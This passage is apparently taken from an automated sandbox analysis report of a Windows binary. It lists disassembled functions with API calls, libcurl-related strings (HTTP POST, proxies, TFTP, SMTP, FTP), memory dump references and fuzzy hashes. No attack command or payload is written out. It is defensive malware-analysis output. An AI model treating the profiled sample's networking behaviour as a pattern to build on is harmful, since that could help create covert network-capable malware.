      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %x$0$0$100-continue$Content-Length$Content-Length: %I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request
    • API String ID: 3286693010-2697197448
    • Opcode ID: 62d3501a3afadad1719d47d374a0d1f4767becad4f1d471ab3a1d059fb923275
    • Instruction ID: aac6b310c18fd62e731eb7a7629042b0522afb00cbc3754d25866bd240de481f
    • Opcode Fuzzy Hash: 62d3501a3afadad1719d47d374a0d1f4767becad4f1d471ab3a1d059fb923275
    • Instruction Fuzzy Hash: B2F138B5E00318ABDB18DF94C885BEDB7B2AF48304F14C1A9E41DAB381E7759A85DF50
    Function 0065DAC0 Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 368COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006A1600: @_RTC_CheckStackVars@8.LIBCMT ref: 006A1FC7
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065DF62
      • Part of subcall function 006A0D40: @_RTC_CheckStackVars@8.LIBCMT ref: 006A1566
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
    • API String ID: 930174750-874090715
    • Opcode ID: 1cedb774c58fe93b673656092c6320549844f1afb9ceee0d5e8feabe093b2810
    • Instruction ID: ae8fd0b90ab8d27f11ee108eb0942e2978eb15014b8135a14560362c27bb7b90
    • Opcode Fuzzy Hash: 1cedb774c58fe93b673656092c6320549844f1afb9ceee0d5e8feabe093b2810
    • Instruction Fuzzy Hash: 21E159B1E00208DFEB24DF94D846BEEB7B7AF44306F144128E9056B381D7B5AD49CB96
    Function 0068B5A0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 335networkCOMMON
    Download Yara Rule
    APIs
    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 0068B6EA
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068B70E
    • sendto.WS2_32(?,?,00000004,00000000,-000000C8,?), ref: 0068B7EB
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068B80F
    • sendto.WS2_32(?,?,00000004,00000000,-000000C8,?), ref: 0068B99B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068B9DC
    Strings
    • Received last DATA packet block %d again., xrefs: 0068B64B
    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 0068B885
    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 0068B673
    • tftp_rx: internal error, xrefs: 0068B9B3
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: sendto$ErrorLast$CheckStackVars@8
    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
    • API String ID: 935641411-1785996722
    • Opcode ID: bd0d09a5e98b1e915b95e3553c4d33b5a0f104709241e21c4be204e63b1eb646
    • Instruction ID: cf1f0f1133e40e8c6ae19abe948e631a1d79161553f44dfa88afceb3a302ce28
    • Opcode Fuzzy Hash: bd0d09a5e98b1e915b95e3553c4d33b5a0f104709241e21c4be204e63b1eb646
    • Instruction Fuzzy Hash: 65D180B5A00208EFDB44EF54DC91FAE7766EF48344F148268F9099B392D735EA81CB94
    Function 00696C40 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 253COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _memcmp$CheckStackVars@8_strlen
    • String ID: @$AUTH $Remote access denied: %d$SIZE$STARTTLS$STARTTLS not supported.$Unexpectedly short EHLO response
    • API String ID: 2717985429-4152370331
    • Opcode ID: 4d50ce1e4a485b9695f39473b8be476ca4abd39efe533af6b28281ba80d94b0e
    • Instruction ID: 8497db01300bed8e68a4f85d7fbe7b536a503c4178aa73d412f8f6ca032862b2
    • Opcode Fuzzy Hash: 4d50ce1e4a485b9695f39473b8be476ca4abd39efe533af6b28281ba80d94b0e
    • Instruction Fuzzy Hash: 6BA17AB0E04209DBCF04CF98C994AFEBBBAAF44308F2484A9E8116B741D735AA45CB51
    Function 00684470 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 213COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: : %ld$CSeq:$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Session:$Unable to read the CSeq header: [%s]
    • API String ID: 3286693010-1980595417
    • Opcode ID: 3c049ac214e3841c69ae041e696fa283125ec450e5d41583d7e4638b034c57ef
    • Instruction ID: c079c2c2c561566341fc1050bec5c425b100c1519ec6ef1ec7437f48a9b0c5ba
    • Opcode Fuzzy Hash: 3c049ac214e3841c69ae041e696fa283125ec450e5d41583d7e4638b034c57ef
    • Instruction Fuzzy Hash: AF8194B0E011069FDB14EF98D991BBEB7B6AF49304F14816DE905AB345EB389E02CF51
    Function 00687210 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 144COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: ?????$?????$?????
    • API String ID: 3286693010-277993871
    • Opcode ID: cea888c18157658242c433ecd916e1e8c641b5b12310045e45e58111f6b084eb
    • Instruction ID: 83cd23768479d6d10f25e600812c2a352d369f64075768b154485793d81dded5
    • Opcode Fuzzy Hash: cea888c18157658242c433ecd916e1e8c641b5b12310045e45e58111f6b084eb
    • Instruction Fuzzy Hash: A0512EF6E002189BCB10DB54DC51FA973F6EB88304F4481EDB60D67243E635AA858F9D
    Function 0069ED30 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 372COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
      • Part of subcall function 006B4650: @_RTC_CheckStackVars@8.LIBCMT ref: 006B4748
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $@$AUTH %s$AUTH %s$CCC$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$P$PROT %c$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
    • API String ID: 930174750-3527538272
    • Opcode ID: 856d4208de7ee4164bbe06892c26d5588d191de8cb744fcaba0b8cf384b05656
    • Instruction ID: 6a5145eb78ddf03b8d36341ec585755686bbae341fd267095f6e97aa6539c806
    • Opcode Fuzzy Hash: 856d4208de7ee4164bbe06892c26d5588d191de8cb744fcaba0b8cf384b05656
    • Instruction Fuzzy Hash: F3F18BB4E00209EFCF04DF94D945BEEB7BAAB44304F218179E405AB781D7759E86DB90
    Function 006E0D55 Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006E0D72
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E0D84
    • _free.LIBCMT ref: 006E0D96
    • _free.LIBCMT ref: 006E0DA8
    • _free.LIBCMT ref: 006E0DBA
    • _free.LIBCMT ref: 006E0DCC
    • _free.LIBCMT ref: 006E0DDE
    • _free.LIBCMT ref: 006E0DF0
    • _free.LIBCMT ref: 006E0E02
    • _free.LIBCMT ref: 006E0E14
    • _free.LIBCMT ref: 006E0E26
    • _free.LIBCMT ref: 006E0E38
    • _free.LIBCMT ref: 006E0E4A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 5ee444945f32578c606e6b6a0fa68b5f69c5e3095552b5e4636ac0fc55863627
    • Instruction ID: 73c0338229f4762a526f86a3a8e98ff5f552da8d63f3def66618f493950d46e5
    • Opcode Fuzzy Hash: 5ee444945f32578c606e6b6a0fa68b5f69c5e3095552b5e4636ac0fc55863627
    • Instruction Fuzzy Hash: A2216132945340AFC660EBA9F98AC5AB3EBAB007507644D0AF555D7792CE74FCC08E6C
    Function 006945F0 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 226COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 00694631
    • _memcmp.LIBVCRUNTIME ref: 00694657
    • _memcmp.LIBVCRUNTIME ref: 00694680
    • _memcmp.LIBVCRUNTIME ref: 006946B5
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694895
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _memcmp$CheckStackVars@8_strlen
    • String ID: +$@$SASL $STLS$STLS not supported.$USER
    • API String ID: 2717985429-1664908783
    • Opcode ID: 73359c9528a9d6fcb26488bdc44c3c8830f92c6ca512af88e4bc1da48d2f6f17
    • Instruction ID: fb7efef778a0dbcbf293e2f5cd03bc3b6a7334ee6fdb31319e8818c983442f58
    • Opcode Fuzzy Hash: 73359c9528a9d6fcb26488bdc44c3c8830f92c6ca512af88e4bc1da48d2f6f17
    • Instruction Fuzzy Hash: DA914AB4E001499FCF04CF94D990EFEBBBAAF49304F248599D8156B741DB31AE42CB95
    Function 006BBBE0 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 213COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BBE8D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
    • API String ID: 930174750-2602438971
    • Opcode ID: 7f94666eec02b0c7c4468fbb567aef2d9e053d546a3dbf3c0478ab6b65990a89
    • Instruction ID: fef8624962767b8435d209f859fba633f7c3323837a820cdbf684c62d8c4a884
    • Opcode Fuzzy Hash: 7f94666eec02b0c7c4468fbb567aef2d9e053d546a3dbf3c0478ab6b65990a89
    • Instruction Fuzzy Hash: 3581A1B0A04209DBDB04CBA4DC42BEDBBB7DF54304F109529EA01AB396E7F9D9C28751
    Function 00680040 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 170COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00680062
    • ___from_strstr_to_strchr.LIBCMT ref: 006801CB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
    • API String ID: 601868998-3209074899
    • Opcode ID: 5d369a1f0407587b047109d70e00091b046223edb77364a8c0ea3f0c912ebbf9
    • Instruction ID: 251909999c384b6b411eddd31fdcac67e95f83aaf0e230a25560c35eeaf6d594
    • Opcode Fuzzy Hash: 5d369a1f0407587b047109d70e00091b046223edb77364a8c0ea3f0c912ebbf9
    • Instruction Fuzzy Hash: 6851BAB4E00208EBEB40EFA4DC85BAE37B6EB45314F108A58FC059B381D374AA45CB95
    Function 00640FA0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Getcvt
    • String ID: ?qo$false$true
    • API String ID: 1921796781-1526544774
    • Opcode ID: 6c36363bbf288d8eeca3c72bf9ddfc95f2649f9ff78a6843a8c672ec60f5c9e9
    • Instruction ID: 5ca4c9cbf7287c528a957826261a462cf47384ecde8fc1d88cf7c42d01feab91
    • Opcode Fuzzy Hash: 6c36363bbf288d8eeca3c72bf9ddfc95f2649f9ff78a6843a8c672ec60f5c9e9
    • Instruction Fuzzy Hash: 80518831A042448BCB10DFA4C841BEABFA7EF42714F18816EEA449F342DB779941CBA1
    Function 006E1A5D Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006E1A96
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D72
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D84
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D96
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DA8
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DBA
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DCC
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DDE
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DF0
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E02
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E14
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E26
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E38
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E4A
    • _free.LIBCMT ref: 006E1AB8
    • _free.LIBCMT ref: 006E1ACD
    • _free.LIBCMT ref: 006E1AD8
    • _free.LIBCMT ref: 006E1AFA
    • _free.LIBCMT ref: 006E1B0D
    • _free.LIBCMT ref: 006E1B1B
    • _free.LIBCMT ref: 006E1B26
    • _free.LIBCMT ref: 006E1B5E
    • _free.LIBCMT ref: 006E1B65
    • _free.LIBCMT ref: 006E1B82
    • _free.LIBCMT ref: 006E1B9A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: d68828f1dbf90aa1726d5e88cfe76bd7ee2a638269dad9f9b2db5f4d80105c52
    • Instruction ID: 9c31d6775042ff0d50ba3dea641f231485690ca5d1372794ad214eba46c725a1
    • Opcode Fuzzy Hash: d68828f1dbf90aa1726d5e88cfe76bd7ee2a638269dad9f9b2db5f4d80105c52
    • Instruction Fuzzy Hash: 6E318B31A057419FEB60AB3AD949BA6B3EBEF01750F10442EE459DB391EE70BD80DB14
    Function 006D8632 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D82D3: CreateFileW.KERNEL32(00000000,00000000,?,006D86DB,?,?,00000000,?,006D86DB,00000000,0000000C), ref: 006D82F0
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D8746
    • __dosmaperr.LIBCMT ref: 006D874D
    • GetFileType.KERNEL32(00000000), ref: 006D8759
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D8763
    • __dosmaperr.LIBCMT ref: 006D876C
    • CloseHandle.KERNEL32(00000000), ref: 006D878C
    • CloseHandle.KERNEL32(?), ref: 006D88D9
    • GetLastError.KERNEL32 ref: 006D890B
    • __dosmaperr.LIBCMT ref: 006D8912
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
    • String ID: H
    • API String ID: 4237864984-2852464175
    • Opcode ID: 7097fd566ed1b47a1e58b0aba817356eb6a8b673b85402bbe28d227801b7f560
    • Instruction ID: 5579dd7368af06f02433b559f00e051ff9b4dacf47b9439c01bdc3a58456c186
    • Opcode Fuzzy Hash: 7097fd566ed1b47a1e58b0aba817356eb6a8b673b85402bbe28d227801b7f560
    • Instruction Fuzzy Hash: F3A10631E041499FCF199FA8DC55BAE3BA2AB06320F24415EF811AF391DF349D16CB95
    Function 0069E6B0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 257COMMON
    Download Yara Rule
    APIs
    • _strstr.LIBCMT ref: 0069E755
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E9F2
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen$_strstr
    • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$N$RETR response: %03d$}
    • API String ID: 2009688273-937278969
    • Opcode ID: 020ff9cdf8fb3be227d15c4c1efa666f17784bb8eaea450a4309a23c28078120
    • Instruction ID: a3d5d7447b6c42cfe018b233873d04217722e3ba152dce13114e03c55daf4ebf
    • Opcode Fuzzy Hash: 020ff9cdf8fb3be227d15c4c1efa666f17784bb8eaea450a4309a23c28078120
    • Instruction Fuzzy Hash: 9BB12BB4E00208DFDF14CF98C885AEDBBB6BF48314F14826DE9156B791D736AA41CB91
    Function 006731D4 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 244COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
